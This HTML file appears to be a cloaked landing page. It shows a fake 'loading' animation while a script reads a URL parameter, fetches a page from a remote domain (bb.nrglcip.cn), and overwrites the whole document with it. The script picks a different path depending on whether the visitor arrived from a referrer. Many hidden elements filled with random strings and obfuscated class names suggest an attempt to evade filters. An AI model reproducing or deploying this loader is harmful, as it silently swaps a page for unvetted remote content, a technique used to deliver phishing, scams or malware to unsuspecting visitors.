<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Boiql4LxXic {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Boiql4LxXic .eSsVSin {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Boiql4LxXic .content {
            line-height: 50px;
            text-align: center
        }

        .Boiql4LxXic .img {
            width: 100%
        }

        .Boiql4LxXic .K7RJHdvmxik {
            text-align: center
        }

        .Boiql4LxXic .K7RJHdvmxik span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Boiql4LxXic .K7RJHdvmxik span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Boiql4LxXic .K7RJHdvmxik span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Boiql4LxXic .K7RJHdvmxik span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Boiql4LxXic .K7RJHdvmxik span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Boiql4LxXic .K7RJHdvmxik span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Boiql4LxXic .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LFrIltzeF3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ieFGh = LFrIltzeF3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ieFGh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ieFGh +".html?a=share";
		}
		
        xIrsx9ntk=url+"#"+new Date().getTime();
        xIrsx9ntk && function() {
            $.get(xIrsx9ntk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>zyYDJ5F22XBa49vSfYB5BTGxQfG9Ji1ZY3NzVMI2crO9v4Tp4voX31TrKcoWP92e2Vh2j6wOTUYayL4yllIG2QPIjNxdvX3</p>
<b style='display:none' >oGCNgOPBUz8sjBlLEYPF1c6uHrDpBwYDZqCszMFMPJxM76IAJJ1neg</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>fcOzbSyEsBwve9CxDMBntnVY72UttmuQqlsrZi2PBOT0jJibb5nIUnc8aK8gX7o0eymrzj8qh9OQswVBOS0Cqnq2u8Am</a>
<div style='display:none'>oSZsQMcXsJuQgKnoNPPQKGOeIhTRPswI4BXO2PNg2cQE</div>
<span style='display:none'>GMCA7klmjRtwqbj4xJveHA1l7rjZGeE51Mqdx</span>
<img  src='' style='display:none'><div class="Boiql4LxXic">
    <div class="eSsVSin">
        <div class="K7RJHdvmxik">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>xhv89JeaJ73B32s3c0xvf2I3lH3OXrtwp3XoID4XGQ5MDicgWtau</span>
<ul style='display:none' >dIZkM3Yz6A4HTamEIG9QYxEp9T8VT9Af6yFuwxh7WzBraxMnUBis6tbI7PeUdKR15</ul>
<li style='display:none' >QWt5KiWmUrdtkRHQYfysNnhwNmyAOvka5BaRQbWaDXqPyY1aKKG</li>
<ul style='display:none' >dIZkM3Yz6A4HTamEIG9QYxEp9T8VT9Af6yFuwxh7WzBraxMnUBis6tbI7PeUdKR15</ul>
<p  style='display:none'>R8NDnlSYWG6HiXqL6lE22w</p>
<span style='display:none'>xhv89JeaJ73B32s3c0xvf2I3lH3OXrtwp3XoID4XGQ5MDicgWtau</span>
<li style='display:none' >QWt5KiWmUrdtkRHQYfysNnhwNmyAOvka5BaRQbWaDXqPyY1aKKG</li>
<b style='display:none' >b3AQbTB5q37HLq6KT7FLUNeDQLCqR7jtwnR607JpF3dCshVrqwgfT0BkTfzPyeBQngM0bqtutcIJfXQ</b>
<ul style='display:none' >dIZkM3Yz6A4HTamEIG9QYxEp9T8VT9Af6yFuwxh7WzBraxMnUBis6tbI7PeUdKR15</ul></body>
</html>